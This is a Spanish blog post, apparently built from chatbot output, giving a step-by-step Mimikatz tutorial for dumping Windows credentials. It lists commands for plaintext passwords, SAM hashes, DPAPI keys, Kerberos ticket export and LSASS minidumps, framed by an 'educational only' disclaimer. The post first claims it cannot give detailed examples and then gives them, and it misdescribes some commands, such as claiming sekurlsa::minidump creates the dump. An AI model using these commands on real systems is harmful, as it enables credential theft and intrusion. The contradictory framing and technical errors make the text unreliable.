Ir al contenido principal

🥇▷ Hacking con Mimikatz

"Mimikatz" es una herramienta que se ha utilizado históricamente para extraer credenciales y contraseñas almacenadas en sistemas Windows. Aunque originalmente fue creado para demostrar vulnerabilidades en la seguridad de Windows, también se ha utilizado con fines maliciosos. Como resultado, es importante recordar que el uso indebido de esta herramienta puede ser ilegal y violar la privacidad y la seguridad de los sistemas.

Dado que el uso de Mimikatz conlleva riesgos legales y éticos, no puedo proporcionarte ejemplos detallados de cómo usar la herramienta en cuestiones maliciosas. Sin embargo, puedo proporcionarte un ejemplo educativo que muestra cómo se utiliza Mimikatz para extraer contraseñas almacenadas en un sistema Windows. Recuerda que este ejemplo debe usarse solo con fines educativos y éticos, y no para actividades maliciosas.

Supongamos que tienes acceso legítimo a un sistema Windows y deseas demostrar cómo Mimikatz podría extraer contraseñas:

  1. Descargar Mimikatz: Descarga la última versión de Mimikatz desde su repositorio oficial o de una fuente confiable.

  2. Abrir una línea de comandos con privilegios de administrador: Ejecuta la línea de comandos como administrador.

  3. Cargar el módulo de Mimikatz: Ejecuta el siguiente comando en la línea de comandos para cargar el módulo de Mimikatz en la memoria del sistema:

     mimikatz # privilege::debug 

    4. Listar las credenciales almacenadas: Ejecuta el siguiente comando para listar las credenciales almacenadas en el sistema:

     mimikatz # sekurlsa::logonpasswords

    Este comando mostrará las credenciales almacenadas en el sistema, incluyendo nombres de usuario y contraseñas en texto plano o en formato de hash.

    5. Extraer contraseñas en texto claro:

     mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" "exit"

    Este comando ejecutará Mimikatz y tratará de obtener contraseñas en texto claro de las sesiones de inicio de sesión actuales.

    6. Extraer hashes de contraseñas:

     mimikatz.exe "privilege::debug" "lsadump::sam" "exit"


    Este comando intentará extraer hashes de contraseñas almacenados en la base de datos SAM de Windows.

     7. Extraer claves de cifrado DPAPI:

    mimikatz.exe "privilege::debug" "dpapi::cache" "exit"

    Con este comando, se extraen claves de cifrado almacenadas en la caché de protección de datos (DPAPI) de Windows.

    8. Exportar hashes de contraseñas a un archivo:

    mimikatz.exe "privilege::debug" "lsadump::sam" "log" "exit"

    Agregando "log" después de las instrucciones, Mimikatz exportará los resultados al archivo mimikatz.log en el mismo directorio.

    9. Ejecutar comandos después de la extracción:

    mimikatz.exe "privilege::debug" "lsadump::sam" "token::elevate" "sekurlsa::logonPasswords" "exit"
     

    Puedes ejecutar varios comandos de Mimikatz en secuencia utilizando esta sintaxis.

    10. Extraer información sobre tickets Kerberos:

    mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
     

    Este comando extraerá información sobre los tickets Kerberos almacenados en el sistema.

    11. Obtener información sobre credenciales almacenadas en LSASS:

     mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit" 

     Con este comando, primero se crea un volcado minidump de LSASS y luego se intenta extraer las contraseñas de inicio de sesión.

     Recuerda que este ejemplo se proporciona únicamente con fines educativos y para aumentar la conciencia sobre las vulnerabilidades de seguridad que Mimikatz puede explotar. El uso indebido de esta herramienta para obtener acceso no autorizado a sistemas o robar información personal es ilegal y perjudicial. Siempre actúa de manera ética y cumple con las leyes y regulaciones aplicables.

Entradas populares de este blog

🥇▷ Como hackear una base de datos con sqlmap

Como hackear una base de datos con sqlmap (sql injection) sqlmap --help Nos descargamos la pagina web vulnerable (DVWA) para practicar sobre diferentes ataques a nivel Web desde la siguiente url, y seguimos los pasos que nos indican para la instalacion web y su base de datos. https://github.com/digininja/DVWA/releases Una vez instalado nos vamos a burpsuite que esta en kali linux, aunque lo podemos encontrar para windows tambien. Le damos click. En esta ventana le damos Next (siguiente). En esta ventana le damos Start burp. Se nos abrira la ventana de burpsuite. Por cierto burpsuite sirve para escanear webs y encontrar vulnerabilidades de forma automatica (30 dias gratis) o de forma manual gratis, si ya hemos localizado la vulnerabilidad atraves de un proxy. Esta vez lo hacemos de forma manual. Nos vamos a la pestaña proxy. Activamos intercept is on. Y le damos a open browser. Ponemos la direccion Web de DVWA de nuestra web vulnerable. Le d

🥇▷ Vulnerabilidad xss en web gva.es generalitat valenciana

Vulnerabilidad xss reflected en web generalitat valenciana > gva.es El dia que encontremos 2 vulnerabilidades y la reportemos al organismo de la comunidad valenciana (españa) basada en la vulnerabilidad xss reflected. ¿Que es una vulnerabilidad xss reflected? Una secuencia de comandos en sitios cruzados o Cross-site scripting es un tipo de vulnerabilidad informática o agujero de seguridad típico de las aplicaciones Web, que puede permitir a una tercera persona inyectar en páginas web visitadas por el usuario código JavaScript o en otro lenguaje similar.

🥇▷ Libros de Seguridad Informatica

Libros de Seguridad Informatica https://0xword.com/